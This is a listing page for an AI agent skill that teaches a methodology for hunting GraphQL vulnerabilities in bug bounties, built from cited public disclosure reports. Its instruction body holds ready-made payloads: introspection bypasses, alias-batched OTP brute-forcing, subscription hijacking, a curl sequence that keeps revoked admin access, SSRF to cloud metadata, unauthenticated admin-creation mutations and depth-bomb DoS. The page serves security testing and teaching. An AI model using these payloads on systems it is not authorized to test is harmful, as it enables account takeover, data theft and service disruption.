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Hunt Graphql

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elementalsouls
hunt-graphql

Hunting skill for graphql vulnerabilities. Built from 12 public bug bounty reports across IDOR via node() / GID, mutation IDOR including AI/LLM features, cross-tenant IDOR, SSRF via argument, batching-DoS, query-cost-bypass, SQLi via argument, broken-object-level-authz, auth-bypass via unscoped mutations, and PII exposure from missing field-level authz. Use when hunting graphql on any target.

Overview

Publisherelementalsouls
RepositoryClaude-BugHunter
Skill namehunt-graphql
Stars
4.5K
Forks
678
Bundled files
Instructions only
LicenseMIT
Links
  • Markdown instructions

    A SKILL.md file the model loads on demand, so it only costs tokens when a request actually matches.

  • Works with any LLM

    AI skills are plain Markdown, not provider-specific code, so this works with GPT, Claude, Gemini, Grok, or a local model.

  • Self-contained

    Everything the model needs lives in the instructions — no extra files to sync.

  • Open source

    Published by elementalsouls on GitHub. Read the source before you install it.

Installation

Install the Hunt Graphql AI skill in TypingMind to use it with any LLM, or drop it into another agent that reads SKILL.md.

1

Install in TypingMind

TypingMind installs a skill straight from its GitHub folder — it reads SKILL.md, bundles the resource files, and stores the result locally.

  1. Open the app and go to Plugins → Skills.
  2. Choose "Install from GitHub".
  3. Paste the skill folder URL below and confirm.
  4. Enable the skill in any chat where you want it available.
Plugins → Skills → Add skill → From GitHub URL, then paste the folder URL and press Continue.
2

Install in another agent

Any agent that reads the Agent Skills format can use this skill — copy the folder into that agent's skills directory.

Claude Code — .claude/skills
git clone --depth 1 https://github.com/elementalsouls/Claude-BugHunter.git /tmp/Claude-BugHunter
mkdir -p .claude/skills
cp -r /tmp/Claude-BugHunter/skills/hunt-graphql .claude/skills/hunt-graphql
Restart Claude Code after copying so it picks up the new skill.

Use it in TypingMind

Enable Hunt Graphql in any TypingMind chat and the model takes it from there. Its name and description sit in the system prompt, and the moment a request matches, the model loads the full instructions itself — you never invoke it by hand, and it costs no tokens until it is actually used.

The model loads Hunt Graphql on its own as soon as a request matches it.

Works with any AI model

AI skills are plain Markdown instructions rather than provider-specific code, so Hunt Graphql is not tied to the model it was written for. Install it once in TypingMind and use it with GPT-5, Claude, Gemini, Grok, DeepSeek, Mistral, Llama, or a local model you run yourself — all on your own API keys.

  • Loaded only when it is needed

    The system prompt carries just the name and description. The instructions are fetched on the first matching request, so an idle skill costs nothing.

  • Switch models mid-chat

    Because the skill is instructions rather than code, changing model does not break it — the next model reads the same SKILL.md.

Skill instructions

This is the SKILL.md content the model loads. Read it before installing — a skill is instructions your model will follow.

Crown Jewel Targets

GraphQL vulnerabilities are high-value because the attack surface is both broad and deep — a single endpoint can expose entire data models, privilege escalation paths, and cross-API state confusion. Highest payouts occur in:

  • Platform APIs (GitHub, Shopify, Stripe-tier targets) where GraphQL mutations interact with REST APIs managing the same resources
  • Race conditions between GraphQL mutations and REST endpoints where state synchronization is non-atomic — these hit medium-to-high severity reliably
  • Authorization persistence bugs where team/org/repo membership state is controlled by one API but readable/writable by another
  • B2B SaaS platforms where one tenant affecting another via schema traversal = critical
  • Internal admin GraphQL endpoints accidentally exposed to lower-privilege users

The GitHub reports demonstrate the crown jewel pattern: privilege that should be revoked persists because two APIs disagree on ground truth.


Attack Surface Signals

URL Patterns:

/graphql
/api/graphql
/v1/graphql
/query
/gql
/graph
/api/v2/graphql
/internal/graphql

Response Headers:

Content-Type: application/json  (with query body)
X-Request-Id + no REST-style path params = likely GraphQL

JavaScript Source Patterns:

js
// grep for these in JS bundles
"query {"
"mutation {"
"__typename"
"apollo"
"ApolloClient"
"graphql-tag"
"gql`"
"operationName"
"GRAPHQL_URI"

Tech Stack Signals:

  • Apollo Server/Client in JS bundles
  • Relay in React apps
  • graphene or strawberry (Python), graphql-ruby, gqlgen (Go), Lighthouse (Laravel)
  • POST requests with {"query": "..."} body shape in Burp history
  • __schema or __type in any response = confirmed GraphQL

Recon Sources:

  • github.com search: "graphql" site:target.com
  • Wayback Machine for /graphql paths
  • JS bundle scanning with LinkFinder or getallurls

Step-by-Step Hunting Methodology

  1. Discover the endpoint — spider JS bundles, check /graphql, /api/graphql, review Burp passive scan hits for application/json POST with query fields

  2. Test introspection — send the full introspection query. Even if blocked, try field-level enumeration:

    graphql
    { __typename }

    If that returns, introspection may be partially blocked but the schema is discoverable

  3. Map the full schema — use InQL (Burp extension) or graphql-voyager to visualize relationships. Specifically look for:

    • Mutations that modify ownership, permissions, or membership
    • Mutations that mirror REST API functionality
  4. Identify REST/GraphQL overlap — document every resource that can be modified via BOTH REST and GraphQL. These dual-write surfaces are your RC targets.

  5. Test authorization boundaries per mutation — replay mutations as lower-privilege users. Does the server enforce the same authz as the equivalent REST call?

  6. Hunt cross-API state desync — find sequences where:

    • REST action should revoke access
    • GraphQL mutation re-grants or preserves it
    • Test the ordering: REST first → GraphQL → check state; then GraphQL first → REST → check state
  7. Test for persistent privilege after role/membership changes — remove a user via REST, then call the corresponding GraphQL mutation for that resource. Query current state via both APIs and compare.

  8. Probe for IDOR in node IDs — GraphQL global IDs often encode object type + ID. Swap IDs across object boundaries and across account contexts.

  9. Check batch query abuse — send arrays of operations to bypass rate limiting or amplify enumeration.

  10. Document the exact reproduction chain — for RC bugs, time-based steps must be reproducible deterministically.


Payload & Detection Patterns

Full Introspection Query:

graphql
{
  __schema {
    types {
      name
      fields {
        name
        type {
          name
          kind
        }
      }
    }
  }
}

Minimal Introspection Probe (bypass attempt):

graphql
{ __typename }

curl introspection test:

bash
curl -s -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer YOUR_TOKEN" \
  -d '{"query":"{ __schema { queryType { name } } }"}' | jq .

Field suggestion probe (bypass blind introspection blocks):

graphql
{ unknownField }

If response returns "Did you mean: [realFieldName]?" — schema is enumerable despite introspection being disabled.

Batch query amplification:

json
[
  {"query": "{ user(id: 1) { email } }"},
  {"query": "{ user(id: 2) { email } }"},
  {"query": "{ user(id: 3) { email } }"}
]

Subscription hijacking (cross-user channel access):

graphql
subscription { messageAdded(channelId: "OTHER_USERS_CHANNEL") { content sender { email } } }

If subscriptions lack per-user scoping, an attacker can receive real-time events from another user's channel or conversation.

Multi-code OTP/2FA brute-force via alias batching:

graphql
mutation { 
  v1: verifyOtp(code:"000001"){token} 
  v2: verifyOtp(code:"000002"){token}
  v3: verifyOtp(code:"000003"){token}
}

A single GraphQL request aliases the same mutation with different OTP codes. Combined with parallel HTTP, this defeats per-request rate limiting and compresses brute-force attempts into fewer network round-trips.

RC desync test pattern (pseudo-sequence):

bash
# Step 1: Grant access via REST
curl -X PUT https://api.target.com/repos/ORG/REPO/teams/TEAM \
  -H "Authorization: token ADMIN_TOKEN" \
  -d '{"permission":"admin"}'

# Step 2: Revoke via REST  
curl -X DELETE https://api.target.com/repos/ORG/REPO/teams/TEAM \
  -H "Authorization: token ADMIN_TOKEN"

# Step 3: Re-assert via GraphQL mutation
curl -X POST https://api.target.com/graphql \
  -H "Authorization: bearer ATTACKER_TOKEN" \
  -d '{"query":"mutation { updateTeamsRepository(input: {repositoryId: \"REPO_ID\", teamId: \"TEAM_ID\", permission: ADMIN}) { clientMutationId } }"}'

# Step 4: Verify persistent access
curl https://api.target.com/repos/ORG/REPO/teams \
  -H "Authorization: token ADMIN_TOKEN"

Grep for GraphQL in JS bundles:

bash
grep -Eo '(query|mutation|subscription)\s+\w+\s*[\({]' bundle.js
grep -Eo '"(/[a-z0-9/_-]*graphql[a-z0-9/_-]*)"' bundle.js

GraphQL introspection & audit tooling:

bash
# InQL (Burp extension) — visualize GraphQL schema and relationships
inql -t https://target/graphql --generate-queries

# Clairvoyance — brute-force field names when introspection is disabled
python3 clairvoyance.py -u https://target/graphql -H "Authorization: Bearer TOKEN" -w wordlist.txt -o schema.json

# GraphQL Cop — scan for common misconfigurations (introspection enabled, no depth limits, etc.)
graphql-cop -t https://target/graphql

Common Root Causes

  1. Dual-write without atomic locking — developers implement the same resource modification in both REST and GraphQL independently. Neither system is aware the other exists for that resource. State updates aren't serialized or compared.

  2. Inconsistent authorization middleware — REST endpoints go through one auth layer (e.g., middleware chain), GraphQL resolvers go through a different resolver-level check. The same action, different enforcement.

  3. GraphQL as "new REST" migration — teams add GraphQL mutations that mirror REST functionality without auditing the permission model. The GraphQL version is less mature and skips checks the REST version accumulated over time.

  4. Introspection left on in production — default framework settings (Apollo, Graphene) enable introspection in all environments. Developers forget to disable it, treating it as "just documentation."

  5. Node ID trust without re-authorization — GraphQL global IDs (base64("ObjectType:123")) are decoded and trusted without verifying the requesting user has access to that specific object.

  6. Mutation side effects not mirrored — when a REST action triggers cascading effects (e.g., team removal cascades to permission revocation), the GraphQL equivalent mutation doesn't trigger the same cascades.


Bypass Techniques

Defense: Introspection disabled

  • Bypass via field suggestion errors — send invalid field names and parse "did you mean X?" responses
  • Use clairvoyance to brute-force field names against a wordlist
  • Check JS bundles for hardcoded query strings that reveal the schema

Defense: Depth limiting

  • Fragment spread to increase effective depth without hitting the limiter:
graphql
fragment F on User { repos { teams { members { ...F } } } }

Defense: Rate limiting per IP

  • Use batch operations (array of queries in one POST)
  • Distribute across authenticated sessions

Defense: Auth checks on mutations

  • Test with tokens at different privilege tiers (viewer, member, admin)
  • Test unauthenticated — some mutations don't check session at all
  • Test with tokens from different organizations — multi-tenant IDOR

Defense: WAF blocking __schema

  • Alias the introspection field:
graphql
{ s: __schema { t: types { n: name } } }
  • Use HTTP parameter pollution or alternate content-type headers

Defense: Operation whitelisting (persisted queries)

  • Check if the server falls back to ad-hoc queries when the extensions.persistedQuery hash mismatches
  • Look for a non-whitelisted endpoint (dev, staging, internal proxy)

Alias batching: when it wins races vs when it doesn't

A common claim is "alias batching defeats per-user rate limits and double-spend protections." Whether this actually wins depends on the resolver execution model:

Resolver typeBehavior on aliased mutationsAlias batching wins races?
Multi-threaded / DataLoader-batched asyncAliases run concurrently, share state via batchYES — single HTTP request can amplify a race-target N times
Single-threaded / single-DB-connection per requestAliases run serially; first mutation closes the doorNO — combine with parallel HTTP
Distributed gateway (Apollo Federation)Sub-queries dispatched concurrently to subgraphsDepends on each subgraph

Verification example (single-threaded Flask + SQLite resolver):

  • 10 aliased redeemCoupon mutations in one request → only r1 succeeds, r2-r10 fail with already_redeemed. Alias batching alone is insufficient.
  • The same 10 mutations as 20 parallel HTTP POSTs → 20 successes ($2000 from a $100 coupon).

Operator rule: treat alias batching as a single-RTT recon primitive. For race-target exploitation, combine with hunt-race-condition's parallel-HTTP / Turbo Intruder single-packet attack. Verified in docs/verification/phase2e-jwt-graphql-race.md Test 11 vs Test 12.


Gate 0 Validation

  1. What can the attacker DO right now? Must be a concrete action: access data they shouldn't see, retain privileges after revocation, modify another user's resources. "The schema is visible" alone is not enough — what does the schema unlock?

  2. What does the victim LOSE? Must be a real asset: data confidentiality, access control integrity, org security guarantees. For the RC pattern: an org admin loses the guarantee that removing a team revokes all access. That's a security contract violation.

  3. Can it be reproduced in 10 minutes from scratch? For RC/desync bugs: write the exact curl sequence. Run it twice. If the privilege persists deterministically (not timing-dependent flakiness), it's reportable. If it requires millisecond timing luck, document the window and test on low-load times.


Real Impact Examples

Scenario A — Covert Persistent Admin After Team Removal (GitHub-pattern) An attacker who legitimately had admin access to a repository via team membership gets removed by the org admin through the REST API. The attacker, before removal completes, calls the updateTeamsRepository GraphQL mutation to re-associate their team with admin permissions. The REST removal and GraphQL re-grant create a desync where the UI shows the team as removed, but the GraphQL state preserves admin-level access. The attacker retains covert write access to the repository indefinitely — pushing code, reading secrets in CI/CD — without appearing in the team's member list. This persists through org audits.

Scenario B — Covert Access via Repo Transfer Race (GitHub-pattern) An attacker with admin access initiates a repository transfer to another organization via the REST API. During or after the transfer, they invoke updateTeamsRepository on the now-transferred repo's ID. Because the GraphQL mutation doesn't validate current org ownership state consistently with the REST transfer event, the original attacker's team retains admin access on a repo now owned by a different organization. The receiving org has no visibility into this team association. The attacker can exfiltrate intellectual property from an org they have no legitimate relationship with.

Scenario C — Introspection as Reconnaissance Prerequisite (Shopify-pattern) On a platform where introspection is intentionally enabled (per-program rules), a hunter maps the full schema and discovers undocumented mutations for fulfillmentOrderMove and inventoryAdjust that are not surfaced in public docs. These mutations accept merchant IDs as arguments with no scoping validation visible in the schema. This recon directly enables targeted IDOR testing against merchant-to-merchant data isolation — the introspection itself is zero-severity, but it is the entry point to critical findings.


Disclosed Report Citations (Backfill +9 — 2019-2024)

The following real, verified bug-bounty / coordinated-disclosure cases extend this skill beyond the original 3 internal references. Each is a distinct GraphQL subclass with a working PoC documented in the cited writeup.

  1. HackerOne — Confidential user-data exposure via GraphQL User type (H1 #489146)

    • Subclass: broken field-level authorization (PII exposure)
    • Payload: direct user(id:...) query returning email, backup_codes_hash, facebook_user_id, account_recovery_phone_number_verified_at, totp_enabled
    • Root cause: backend migration introduced a GraphQL User type with no field-level authz; any authenticated user could enumerate PII of all users
    • Year: 2019 — $20,000, 1,028 upvotes
  2. HackerOne — DestroyLlmConversation mutation IDOR (Copilot pre-release) (H1 #2218334)

    • Subclass: mutation IDOR on AI/LLM feature
    • Payload: mutation { destroyLlmConversation(input:{id:"<victim_conv_id>"}) { … } }
    • Root cause: new LLM-conversation mutation shipped without authorization decorator; any user could destroy any conversation
    • Year: 2023 — caught pre-launch, no bounty (202 upvotes)
  3. Shopify — BillingDocumentDownload cross-tenant IDOR (H1 #2207248)

    • Subclass: IDOR on relay GID across tenants
    • Payload: query { billingDocumentDownload(id:"gid://shopify/BillingInvoice/<other_shop_id>") { url } }
    • Root cause: BillingInvoice resolver authorized the requester's shop but did not verify the invoice belonged to that shop
    • Year: 2024 — $5,000, 175 upvotes
  4. Shopify — Rate-limit bypass via negative cost (H1 #481518)

    • Subclass: query-cost-calc abuse (sibling pattern to alias batching)
    • Payload: query { products(first:-100) { … } } — negative first produced a negative query-cost contribution, refilling the leaky-bucket each call
    • Root cause: query-cost calculator did not floor at zero; negative values subtracted from the consumed budget
    • Year: 2019 — $1,000
  5. Stripe — Cross-tenant IDOR via UpdateAtlasApplicationPerson (H1 #1066203)

    • Subclass: cross-tenant IDOR on mutation
    • Payload: mutation { updateAtlasApplicationPerson(input:{personId:"<victim_person_id>", …}) } — adding/modifying a co-founder on another merchant's Stripe Atlas application
    • Root cause: mutation scoped only to "is admin of some merchant," not "is admin of the merchant owning this person"
    • Year: 2020 — bounty undisclosed (resolved)
  6. EXNESS — SSRF in GraphQL allTicks query (H1 #1864188)

    • Subclass: SSRF via GraphQL argument
    • Payload: query { allTicks(source:"http://169.254.169.254/latest/meta-data/") { … } }source arg fed into a server-side HTTP client
    • Root cause: GraphQL field accepted a URL arg and dereferenced it without scheme/host allowlist
    • Year: 2023 — $3,000, 249 upvotes
  7. EXNESS — GraphQL attribute-batching DoS (H1 #2293642)

    • Subclass: DoS via batching / deep-attribute amplification on unauth endpoint
    • Payload: single HTTP request containing N batched operations, each requesting deeply nested attribute trees, sustained until origin OOM
    • Root cause: no query-depth, query-complexity, or batch-size limits on unauthenticated /graphql
    • Year: 2024 — bounty undisclosed (resolved)
  8. GitLab — Malicious-runner attach via runnerUpdate (CVE-2023-2478) (Advisory)

    • Subclass: auth bypass on mutation / project-scope missing
    • Payload: mutation { runnerUpdate(input:{id:"<attacker_runner_gid>", associatedProjects:["<victim_project_gid>"]}) }
    • Root cause: runnerUpdate did not check that the caller had Maintainer on the target project — any user could bind their malicious runner and intercept CI jobs (build secrets, code execution)
    • Year: 2023 — Critical, CVSS 9.6 (H1 bounty undisclosed; GitLab Critical-tier typically $20k–$35k)
  9. AS Watson — Auth bypass via unrestricted createAdminUser mutation (HackerOne blog)

    • Subclass: sensitive mutation reachable without authentication (introspection-aided discovery)
    • Payload: mutation { createAdminUser(input:{email:"x@x", role:"ADMIN", password:"…"}) { token } } invoked unauthenticated after schema enumeration via introspection
    • Root cause: schema lacked per-field authorization directives; createAdminUser exposed to public role
    • Year: 2023 — "Best Bug" prize at HackerOne Ambassador World Cup

Related Skills & Chains

  • hunt-idor — GraphQL node(id:) and global-relay-ID resolvers are IDOR factories: same shape, no scoping. Chain primitive: GraphQL introspection + IDOR (node() resolver) → cross-tenant data via base64-decoded type:id replay.
  • hunt-api-misconfig — GraphQL mutations are mass-assignment magnets: clients send full input objects, server merges. Chain primitive: GraphQL mutation + extra fields (isAdmin:true, verified:true) → mass assignment → role escalation.
  • hunt-business-logic — GraphQL aliases let you call the same mutation N times in one request, defeating per-request rate limits. Chain primitive: aliased mutation + business-logic flaw → coupon redeemed N times in single network round-trip.
  • hunt-race-condition — GraphQL batching collapses N mutations into one HTTP packet — perfect single-packet race vehicle. Chain primitive: GraphQL batch + race → atomic-update missing → double-spend balance.
  • security-arsenal — Load the GraphQL Payload Pack: introspection query, schema-suggestion error probe, alias amplification template, depth-bomb DoS payload, batch-attack template.
  • triage-validation — Apply the Body-Diff Rule: introspection alone is informational; require a concrete cross-tenant read or mutation-with-impact PoC before submitting.

Frequently asked questions

What does the Hunt Graphql AI skill do?

Hunting skill for graphql vulnerabilities. Built from 12 public bug bounty reports across IDOR via node() / GID, mutation IDOR including AI/LLM features, cross-tenant IDOR, SSRF via argument, batching-DoS, query-cost-bypass, SQLi via argument, broken-object-level-authz, auth-bypass via unscoped mutations, and PII exposure from missing field-level authz. Use when hunting graphql on any target.

Why use Hunt Graphql on TypingMind?

Because you install it once and use it with any model. Hunt Graphql is plain Markdown rather than provider-specific code, so the same skill runs on GPT-5, Claude, Gemini, Grok, or a local model — and you can switch model mid-chat without it breaking. TypingMind runs on your own API keys, so you pay providers directly instead of a per-seat subscription, and your skills and chats stay in your own storage.

How do I install Hunt Graphql in TypingMind?

Open Plugins → Skills → Install from GitHub in TypingMind and paste https://github.com/elementalsouls/Claude-BugHunter/tree/main/skills/hunt-graphql. TypingMind reads its SKILL.md and installs it as a skill you can enable per chat.

Which AI models can use Hunt Graphql?

Any model you connect in TypingMind. AI skills are plain Markdown instructions rather than provider-specific code, so GPT, Claude, Gemini, Grok, and local models can all load this skill when a request matches it.

How many AI models can I use with Hunt Graphql?

As many as you like. As long as a model supports skills, you can use Hunt Graphql with it — GPT, Claude, Gemini, Grok, DeepSeek, Mistral, Llama and more — all on TypingMind with your own API keys.

Is the Hunt Graphql AI skill free?

Yes. It is published on GitHub by elementalsouls under the MIT license. You only pay your own AI provider for the tokens you use.

What are AI skills?

An AI skill is a reusable instruction bundle that teaches an AI model how to do one specific task. It follows the open Agent Skills format: a SKILL.md file with a name and description, plus any scripts, templates or reference files the model may need. The model reads the instructions only when your request matches the skill, so an installed skill costs nothing until it is used.

How are AI skills different from plugins or MCP servers?

A plugin or MCP server gives a model new tools to call — code that runs somewhere and returns a result. An AI skill gives the model knowledge and process instead: how to approach a task, which steps to follow, what good output looks like. Skills are plain Markdown, so they need no server, no API key and no runtime, and they work with any model.

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